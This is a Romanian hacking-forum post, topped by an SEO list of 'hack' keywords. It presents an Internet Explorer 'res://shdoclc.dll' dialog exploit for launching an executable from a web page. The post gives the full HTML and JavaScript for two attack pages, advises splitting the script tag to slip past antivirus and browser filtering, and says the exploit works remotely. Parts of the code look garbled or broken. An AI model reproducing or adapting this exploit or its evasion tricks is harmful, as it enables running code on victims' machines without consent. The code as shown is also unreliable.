www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum
Lista Forumurilor Pe Tematici
www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat.
Nou pe simpatie:
ElizaElizaiubi 23 ani
Femeie
23 ani
Satu Mare
cauta Barbat
23 - 53 ani
www.Hacking-Romania.com / Hacking-ul nostru cel de toate zilele / cum deschizi .exe din pagini web  
Autor
Mesaj Pagini: 1
Storm192
MEMBRU ACTIV

Din: Alba-Iulia
Inregistrat: acum 15 ani
Postari: 244
De unde provin aceste pagini si unde se află???
Hmm nimic mai simplu, astfel de mesaje sau mai bine spus pagini HTML, sunt continute într-o librărie DLL mai precis în SHDOCLC.DLL pe care o puteti găsi în directorul "....\windows\system32" (asta în sistemele windows 2000/XP).
La continutul acestui file se poate accesa din browser-ul nostru (normal, unul IIS) prin prefixul "res://"
Dacă vreti să faceti cite-un test iată unele dintre adresele ce trebuiesc digitate:
res://shdoclc.dll/world.bmp
res://shdoclc.dll/ie5.gif
si altele pe care nu stau acum să le insir.
Dacă intentionati să mergeti să vă uitati la tot ceea ce este continut în librăria DLL vă puteti folosi de programul "EXE.SCOPE";usor de găsit pe Internet.
Vă întrebati la ce foloseste toată această prefatză, cu sigurantă unii dintre voi vor să aplice imediat codul si gata, dar cred ca este necesar să se înteleagă functionalitatea reală fără a sări nici-un pasaj care s-ar putea rivela fundamental.

Asadar, unele dintre paginile continute în interiorul acestei librării DLL realizează functiuni de sistem: în câteva cuvinte unele functionalităti in IIS sunt realizate în HTML, lucru care vă va stupi poate dar este asa, nu este vina mea si nici a voastră.

Aceste pagini au posibilitatea să actioneze, chiar dacă în mod foarte usor, asupra sistemului operativ.
Acum putem trece la partea efectivă a exploit-ului nostru.
Pentru a-l crea este necesar să construim două pagini web si anume:

1) host.html: pagina "oaspete" care contine obiectul <IFRAME>

2) run.html: pagina care contine codul javascript

Cod de introdus pentru a realiza pagina run.html
Cod:
<HTML>
<H1>INTERNET EXPLORER RES-DIALOG EXPLOIT</H1>
(RUN.HTML)

<P>[/i]Tentativo di apertura di una finestra di dialogo in corso...</P>

showModalDialog("base.html",dlg_par);

<script>
function oExploit(iSec) {
return {rel:"stylesheet",
readyState:"exploit",
href:injcode
};
}
oExploit.length=1;

var dlg_par={document:{
all:{tags:function (sTag) {
return sTag=="link" ? oExploit : [];
}
}
}
}

var injcode="<scr>\
var o=open(\"res://shdoclc.dll/about.dlg\",\"\",\"height=100,width=100,resizable\";\
setTimeout(function (){\
o.document.body.innerHTML=\"<object></object>\";}\
,2000);\
</scr>"

showModalDialog("host.html",dlg_par);
</script>
</HTML>


Codul javascript comandă deschiderea ferestrei "oaspete" "host.html" si îi trimite codul exploit-ului care este memorizat în variabila stringa injcode.
Codul continut în injcode lansează un file executabil .EXE creând o pagină de tip res://shdoclc.dll/about.dlg care va fi retinută de IIS ca fiind sigură.
Vazând particularitatea sintaxei codului care este trimis, iată unele racomandări de care trebuie tinut cont:

1) Sintaxa "<scr\ipt" în loc de "<script" este necesară pentru a evita controalele antivirus-ilor si un eventual filtraj din partea însăsi a IIS-ului care ar putea să-si dea seama de truc;

2) Într-ucât injcode este o variabilă stringa, atunci când va trebui introdus în interiorul său simbolul apostrofului, va trebui folosit \";

3) Pentru a îmbunătăti lectura codului a fost folosit simbolul \ pentru a separa diversele instructiuni ale codului cu reîntoarceri la capăt; în realitate stringa injcode este ca si cum ar fi scrisă toată pe o singură linie

4) Parcursul fishierului ce trebuie executat trebuie să fie:
C:/windows/calc.exe si nu C:\windows\calc.exe: recomand acest lucru foarte important si deci, atentie a nu comite erori de acest gen.
Ajunsi până la acest punct, pagina a fost realizată, o salvăm si deschidem o alta nouă!

Realizăm codul paginii "oaspete" care este foarte simplu, tinând cont că se foloseste doar de un tag IFRAME care va merge să tzintească la fereastra de dialog "inculpată" adică res://shdoclc/analyze.dlg
Codul va fi:

Cod:
<html>
(HOST.HTML)
<style>
iframe {
display:none;
}
</style>
<body>
<iframe></iframe>
<h1>Exploit in corso...</h1>
</body>
</html>

Folosirea unui astfel de exploit este posibilă atât în local cât si în remote!

cum deschizi .exe din pagini web unde provin aceste pagini unde află???hmm nimic mai simplu, astfel

29.2KB


_______________________________________
We don't destroy computers fast we hack them low

pus acum 15 ani
   
Pagini: 1  

Mergi la